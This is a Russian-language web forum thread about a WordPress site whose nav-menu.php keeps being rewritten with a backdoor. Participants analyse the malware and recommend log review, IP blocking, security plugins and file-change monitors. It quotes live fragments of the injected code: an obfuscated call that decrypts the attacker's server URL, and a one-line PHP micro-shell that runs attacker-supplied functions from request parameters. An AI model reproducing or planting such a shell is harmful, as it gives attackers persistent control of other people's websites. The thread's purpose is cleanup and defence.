Сайт на WP постоянно взламывается путём перезаписи /wp-includes/nav-menu.php

[shake1]

После айболита касперский находил левый код, а после касперского cureit еще находил. Так что - качайте сайт себе на машину и проверьте с cureit (утилита от dr.web)

 

[SverloFF]

После айболита касперский находил левый код, а после касперского cureit еще находил. Так что - качайте сайт себе на машину и проверьте с cureit (утилита от dr.web)

Айболит вообще фигня, ядро шелла и прочее легко переписать.
Он ищет только по папкам сайта, если заразу спрятать папками выше в ets или tmp - не найдет.

 

[mizaider]

           671           $url = decrypt_url('a3d3czksLDI3Ny0xMDAtNTotOzAsYW9sZCw8c3ZuYiV2d25ccGx2cWBmPjE3MzQyOTQxMzo2MjkyOzs0');

Ваш сайт взаимодействует с сервером злоумышленника который зашифрован в строке 671

 

[latteo]

Ваш сайт взаимодействует с сервером злоумышленника который зашифрован в строке 671

Так и есть, но как красиво это сделано...

Помогите пожалуйста найти причину, как кому-то удаётся постоянно перезаписать nav-menu.php. Установил Firewall и плагин от Sucuri.net, но файл периодически всё равно перезаписывается и туда добавляется вот такой код:

Сам себя данный код не перезаписывает. Но содержит несколько интересных моментов:
- встроенный "антивирус" проверят, что не было измененный файла index.php и .htaccess и, в случае их изменения, перезаписывает с маскировкой даты на нормальные!
- в пользовательскую часть сайта (на все страницы) встраивается дополнительный произвольный html код получаемый с адреса, который опубликовал @mizaider (по возможности прячется от поисковиков)
при этом только на обычные страницы, чтобы не сломать .css .doc и т.д.
- плюс проверка на то что код не удалили... вот тут кстати будет паливо ищите в логах сервера запросы со строкой "062117892ed93da0fade1e74852ed3aa" - узнаете ip сервера хакера и по нему смотрите что еще подозрительного запрашивает.
- ну и конечно микрошелл, который позволит перезалить вирус или залить еще несколько или просто чего-то запустить:

if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');

А советы по поиску уязвимости стандартные и выше большую часть привели. Дополню, что десктопные антивири очень фигово ищют вирусню такого рода. А тот же Айболит покажет много ложных срабатываний, но зато и почти все шелы или подозрительный код.

 

[Hermes_r]

@latteo @mizaider А как запретить любые соединения с адресом злоумышленника? Куда можно написать абузу? Сейчас занимаюсь исследованием логов, по тем рекомендациям, что вы дали. Как я понял невозможно запустить какое-то приложение, которое бы отслеживало все изменения, единственный способ это анализ логов, верно?..
Большое спасибо за анализ скрипта, я уже 3 месяц пытаюсь удалить бэкдор, но он постоянно появляется.

@latteo А в каких логах нужно искать, на сервере хостера есть access_log и error_log и там и там смотрел, но подобной строчки не нашёл. Какого рода ошибка или запись должна быть?..

 

[latteo]

@latteo А в каких логах нужно искать, на сервере хостера есть access_log и error_log и там и там смотрел, но подобной строчки не нашёл. Какого рода ошибка или запись должна быть?..

Смотрели скорее всего верно, только надо учесть, что логи могут архивироваться...
Возможно так же что хакер не настроил отслеживание и таких запросов действительно нет. Хотя во всех чистках где я принимал участие такое было.

@latteo А как запретить любые соединения с адресом злоумышленника?

Это почти анрил, можно добавлять IP адреса злоумышленника в фаервол вашего хостинга, если у него есть такая услуга или у вас VPS, можно в .htaccess (на форуме уже много тем по этому вопросу)
Но обходится это довольно легко через прокси, причем прокси могут поднимать на зараженных сайтах.

Как я понял невозможно запустить какое-то приложение, которое бы отслеживало все изменения, единственный способ это анализ логов, верно?..

Погуглите md5 проверка изменений, у меня под рукой нет готового алгоритма, а суть в том что стандартными утилитами linux можно отслеживать изменения файлов и оперативно реагировать на вмешательство.
Иногда это идёт как плагин в панели хостера, но видел я такое только у зарубежных хостеров.

Для повышения спокойствия можно попробовать пожить без плагинов (удалить физически) и поставив последнюю версию WP. Но вообще движок мегапопулярен и ломают его часто...

 

[Hermes_r]

Смотрели скорее всего верно, только надо учесть, что логи могут архивироваться...
Возможно так же что хакер не настроил отслеживание и таких запросов действительно нет. Хотя во всех чистках где я принимал участие такое было.


Это почти анрил, можно добавлять IP адреса злоумышленника в фаервол вашего хостинга, если у него есть такая услуга или у вас VPS, можно в .htaccess (на форуме уже много тем по этому вопросу)
Но обходится это довольно легко через прокси, причем прокси могут поднимать на зараженных сайтах.


Погуглите md5 проверка изменений, у меня под рукой нет готового алгоритма, а суть в том что стандартными утилитами linux можно отслеживать изменения файлов и оперативно реагировать на вмешательство.
Иногда это идёт как плагин в панели хостера, но видел я такое только у зарубежных хостеров.

Для повышения спокойствия можно попробовать пожить без плагинов (удалить физически) и поставив последнюю версию WP. Но вообще движок мегапопулярен и ломают его часто...

Большое спасибо за идею. Действительно можно собрать хеши всех файлов и далее смотреть, что изменилось и как и в какое время. По поводу вордпреса вы правы. Сейчас как раз смотрю, что из коммерческих вещей более менее может защитить. Смотрю в сторону ninja firewall

Большое спасибо сканер нашел много доров. Удалил их все. Надеюсь этого достаточно.

 

[wpnullorg]

iThemes Security/Smart Security + WordFence + 5G/6G Firewall в .htaccess и будет вам счастье

 

[dimases]

Используйте SerVal Для просмотра ссылки Войди или Зарегистрируйся
Недавно выложили эту систему в свободное скачивание. Как раз и занимается тем, что следит за изменениями файлов.

 

[nostr]

Есть ещё такой вариант: AntiShell - Скрипт для контроля за изменениями в файлах на сайте.
ссылка на GitHub: Для просмотра ссылки Войди или Зарегистрируйся
Сам использую до сих пор, не раз выручало, чуть доработал, и смс приходили (сейчас только по емейл), отчет короткий и по существу: какие файлы появились, удалены, изменены

А вот это то, что нужно! Спасибо!

Пожалуйста, если поставишь, то скрипт лучше запрятать глубоко, что-бы снизить вероятность его нахождения, благо, это легко сделать, всего-то 1 файл, и переименовать можно, на крон поставить, к примеру каждый 30-60 мин. тестировать, это полезно не только для быстрой реакции против взлома, но и для сверки логов сервера со временем обнаружения взлома, по нему можно вычислить IP , если не со своей страны, например всякие прокси и прочее, то можно сразу в блеклист брандмауэра внести, в другом случае, если серьезно, заявление провайдеру или в полицию.